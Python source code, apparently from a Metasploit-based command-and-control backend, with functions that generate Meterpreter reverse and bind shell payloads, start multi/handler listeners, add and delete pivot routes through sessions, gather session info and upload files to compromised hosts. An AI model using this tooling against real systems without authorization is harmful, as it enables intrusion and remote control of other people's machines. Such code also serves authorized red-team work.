def create(sessionid=None, filename=None, dirpath=None, operation=None):
    """Run a file-system operation on a session through the MSF post module.

    Args:
        sessionid: session id, passed through as the module's ``SESSION`` option.
        filename: file to push for ``'upload_file'`` (``MSF_FILE`` option).
        dirpath: directory on the session; normalised with ``FileSession.deal_path``
            before it is sent. No other validation happens here.
        operation: ``'create_dir'`` or ``'upload_file'``; any other value, or a
            missing required argument, yields the 306 response.

    Returns:
        A ``data_return`` context: 201 on success, 301 when the module returned
        nothing, 302 when its output is not JSON (create_dir only), 303 when it
        reports ``status`` other than True (create_dir only), 306 on bad input.
    """
    module = 'multi/manage/file_system_operation_api'

    if operation == 'create_dir' and sessionid is not None and dirpath is not None:
        # Create directory: synchronous run, module answers with a JSON document.
        target_dir = FileSession.deal_path(dirpath)
        module_opts = {'OPERATION': 'create_dir', 'SESSION': sessionid, 'SESSION_DIR': target_dir}
        raw = MSFModule.run('post', module, module_opts, runasjob=False, timeout=12)
        if raw is None:
            return data_return(301, FileSession_MSG.get(301), [])
        try:
            parsed = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(302, FileSession_MSG.get(302), {})
        if parsed.get('status') is not True:
            return data_return(303, FileSession_MSG.get(303), [])
        return data_return(201, FileSession_MSG.get(201), parsed.get('data'))

    if operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None:
        # Upload file: started with runasjob=True, the module result is returned as-is.
        target_dir = FileSession.deal_path(dirpath)
        module_opts = {'OPERATION': 'upload', 'SESSION': sessionid, 'SESSION_DIR': target_dir, 'MSF_FILE': filename}
        raw = MSFModule.run('post', module, module_opts, runasjob=True, timeout=12)
        if raw is None:
            return data_return(301, FileSession_MSG.get(301), {})
        return data_return(201, FileSession_MSG.get(201), raw)

    return data_return(306, FileSession_MSG.get(306), [])
def destory(subnet=None, netmask=None, sessionid=None):
    """Delete the route ``subnet``/``netmask`` on ``sessionid`` via the routeapi post module.

    Args:
        subnet: network part of the route to remove (``SUBNET`` option).
        netmask: mask of the route to remove (``NETMASK`` option).
        sessionid: session whose routing table is changed (``SESSION`` option).

    Returns:
        A ``data_return`` context: 204 on success, 304 when the module reports
        a non-True ``status``, 306 when its output is not JSON, 505 when it
        returned nothing.
    """
    module_opts = {
        'CMD': 'delete',
        'SUBNET': subnet,
        'NETMASK': netmask,
        'SESSION': sessionid,
    }
    raw = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=module_opts)
    if raw is None:
        return data_return(505, CODE_MSG.get(505), [])

    try:
        parsed = json.loads(raw)
    except Exception as E:
        logger.warning(E)
        return data_return(306, Route_MSG.get(306), {})

    if parsed.get('status') is not True:
        return data_return(304, Route_MSG.get(304), {})

    # Report the change on the notice channel; the route text is caller-supplied.
    Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}")
    return data_return(204, Route_MSG.get(204), {})
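def generate_shellcode(mname=None, opts=None):
    """Generate a payload with the MSF payload module and return its raw bytes.

    ``opts`` is mutated in place: the host option that the transport does not
    use is dropped (``RHOST`` for names containing ``reverse``, ``LHOST`` for
    names containing ``bind``); ``OverrideRequestHost`` copies the override
    host/port into ``LHOST``/``LPORT``; a True ``EXTENSIONS`` on a
    ``meterpreter_`` payload becomes ``'stdapi'``; ``Format`` is derived from
    the module name.

    Args:
        mname: payload module name, e.g. ``windows/meterpreter/reverse_tcp``.
            Must be a str; ``None`` raises ``TypeError`` on the first membership test.
        opts: module options dict (keys upper-case, as MSF expects).

    Returns:
        The base64-decoded payload bytes, or ``None`` when the module run
        returned nothing.
    """
    # Substring membership instead of ``find(...) > 0``: a match at index 0
    # is still a match. ``pop`` with a default replaces the try/except swallow.
    if "reverse" in mname:
        opts.pop('RHOST', None)
    elif "bind" in mname:
        opts.pop('LHOST', None)

    # OverrideRequestHost: substitute the override host/port for LHOST/LPORT
    # and tell the operator about it.
    if opts.get('OverrideRequestHost') is True:
        opts["LHOST"] = opts['OverrideLHOST']
        opts["LPORT"] = opts['OverrideLPORT']
        Notice.send_warn("Payload包含OverrideRequestHost参数")
        Notice.send_warn(
            f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
        Notice.send_warn(
            f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

    # EXTENSIONS arrives as a boolean flag; the module wants the extension name.
    if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
        opts['EXTENSIONS'] = 'stdapi'

    # Output format: 'raw' unless the name is a java/python payload. The
    # windows/linux guard keeps the original precedence (those tokens win
    # over "java"/"python" appearing elsewhere in the name).
    fmt = 'raw'
    if "windows" not in mname and "linux" not in mname:
        if "java" in mname:
            fmt = 'jar'
        elif "python" in mname:
            fmt = 'py'
    opts["Format"] = fmt

    result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
    if result is None:
        return result
    return base64.b64decode(result.get('payload'))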
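def _get_info(self, info_part):
    """Fetch one section of session info via the ``multi/gather/base_info`` post module.

    Args:
        info_part: value sent as the module's ``INFO_PART`` option.

    Returns:
        The module's ``data`` field when its JSON answer has a truthy
        ``status``; otherwise ``None`` (no usable session id, no module
        output, unparseable output, or a failed status).
    """
    # One guard instead of two: ``None`` is rejected before the ``<=`` runs,
    # and a non-positive id is treated the same way.
    if self.sessionid is None or self.sessionid <= 0:
        return None

    opts = {'SESSION': self.sessionid, 'INFO_PART': info_part}
    result = MSFModule.run(module_type="post", mname="multi/gather/base_info", opts=opts)
    if result is None:
        return None

    # The try deliberately covers the ``.get`` as well as the parse, so a
    # JSON document that is not an object is also reported as "no data".
    try:
        result_dict = json.loads(result)
        if result_dict.get('status'):
            return result_dict.get('data')
        return None
    except Exception as E:
        logger.warning(E)
        return None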
def create(subnet=None, netmask=None, sessionid=None, autoroute=None):
    """Add a route through ``sessionid`` via the routeapi post module.

    Args:
        subnet: network to route; not sent when ``autoroute`` is True.
        netmask: mask of the route; not sent when ``autoroute`` is True.
        sessionid: session used as the gateway (``SESSION`` option).
        autoroute: when exactly True the module's ``autoadd`` command is used
            instead of ``add``.

    Returns:
        A ``data_return`` context: 201 with the module's ``data`` list on
        success, 305 when ``status`` is not True or ``data`` is not a list,
        306 when the output is not JSON, 505 when the module returned nothing.
    """
    if autoroute is True:
        # 'autoadd': the module chooses the routes, so no subnet/netmask is sent.
        module_opts = {'CMD': 'autoadd', 'SESSION': sessionid}
    else:
        module_opts = {
            'CMD': 'add',
            'SUBNET': subnet,
            'NETMASK': netmask,
            'SESSION': sessionid,
        }

    raw = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=module_opts)
    if raw is None:
        return data_return(505, CODE_MSG.get(505), [])

    try:
        parsed = json.loads(raw)
    except Exception as E:
        logger.warning(E)
        return data_return(306, Route_MSG.get(306), [])

    route_data = parsed.get('data')
    if parsed.get('status') is not True or not isinstance(route_data, list):
        return data_return(305, Route_MSG.get(305), [])

    # Truthiness (not ``is True``) selects the notice text, mirroring the original.
    if autoroute:
        Notice.send_success(f"新增路由,SID:{sessionid} 自动模式")
    else:
        Notice.send_success(
            f"新增路由,SID:{sessionid} {subnet}/{netmask}")
    return data_return(201, Route_MSG.get(201), route_data)
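def create(opts=None):
    """Start a ``multi/handler`` job (or a virtual handler) from ``opts``.

    All option keys must be upper-case as MSF expects, e.g.
    ``{'PAYLOAD': ..., 'LHOST': ..., 'LPORT': ..., 'RHOST': ...}``. ``opts`` is
    mutated in place: the ``proxies_proto``/``proxies_ipport`` pair is folded
    into ``proxies``, the host option the transport does not use is dropped,
    ``EXITONSESSION``/``KillHandlerFouce``/``PayloadUUIDSeed`` are set, and
    ``ID`` receives the job id (or ``None`` on failure).

    Returns:
        A ``data_return`` context: 201 when the handler job is up, 301 when
        the module returned no job id or the job is not alive afterwards,
        500 when option preprocessing raised (e.g. ``PAYLOAD`` missing).
    """
    if opts.get('VIRTUALHANDLER') is True:
        # Virtual listener: handled by Handler, no MSF job is started.
        opts.pop('VIRTUALHANDLER')
        result = Handler.create_virtual_handler(opts)
        if result is None:
            opts['ID'] = None
            return data_return(301, Handler_MSG.get(301), opts)
        return data_return(201, Handler_MSG.get(201), {})

    # Real listener. Fold the proxy pair into one ``proxies`` option;
    # "Direct" or an absent protocol means no proxy, and both keys are
    # always removed from what is sent to the module.
    proxies_proto = opts.pop('proxies_proto', None)
    proxies_ipport = opts.pop('proxies_ipport', None)
    if proxies_proto is not None and proxies_proto != "Direct":
        opts["proxies"] = f"{proxies_proto}:{proxies_ipport}"

    try:
        payload = opts.get('PAYLOAD')
        # Substring membership instead of ``find(...) > 0`` (a match at
        # index 0 counts) and instead of ``find(...)`` truthiness.
        if "reverse" in payload:
            opts.pop('RHOST', None)
        elif "bind" in payload:
            if opts.get('LHOST') is not None:
                opts.pop('LHOST')

        # Reverse http(s) handlers stay resident and must not exit on the
        # first session. The old test used the truthiness of ``str.find``,
        # whose -1 "not found" result is truthy, so this branch fired for
        # nearly every payload; it now applies only to reverse http(s).
        if "reverse_http" in payload or "reverse_winhttp" in payload:
            opts['EXITONSESSION'] = False
            opts['KillHandlerFouce'] = True
        else:
            opts['EXITONSESSION'] = bool(opts.get('EXITONSESSION'))

        # NOTE(review): uuid1 embeds the host MAC address and a timestamp;
        # uuid4 would avoid that if the seed only needs to be unique — confirm
        # how MSF consumes PayloadUUIDSeed before changing.
        opts['PayloadUUIDSeed'] = str(uuid.uuid1())
    except Exception as E:
        # A missing or non-str PAYLOAD lands here (``in`` on None raises).
        logger.error(E)
        return data_return(500, CODE_MSG.get(500), {})

    result = MSFModule.run(module_type="exploit", mname="multi/handler", opts=opts, runasjob=True)
    if not isinstance(result, dict) or result.get('job_id') is None:
        opts['ID'] = None
        return data_return(301, Handler_MSG.get(301), opts)

    job_id = int(result.get('job_id'))
    if not Job.is_msf_job_alive(job_id):
        # Job id was returned but the job is already gone: report as not started.
        return data_return(301, Handler_MSG.get(301), opts)

    opts['ID'] = job_id
    Notice.send_success("新建监听成功:{} {} JobID:{}".format(opts.get('PAYLOAD'), opts.get('LPORT'), result.get('job_id')))
    return data_return(201, Handler_MSG.get(201), opts)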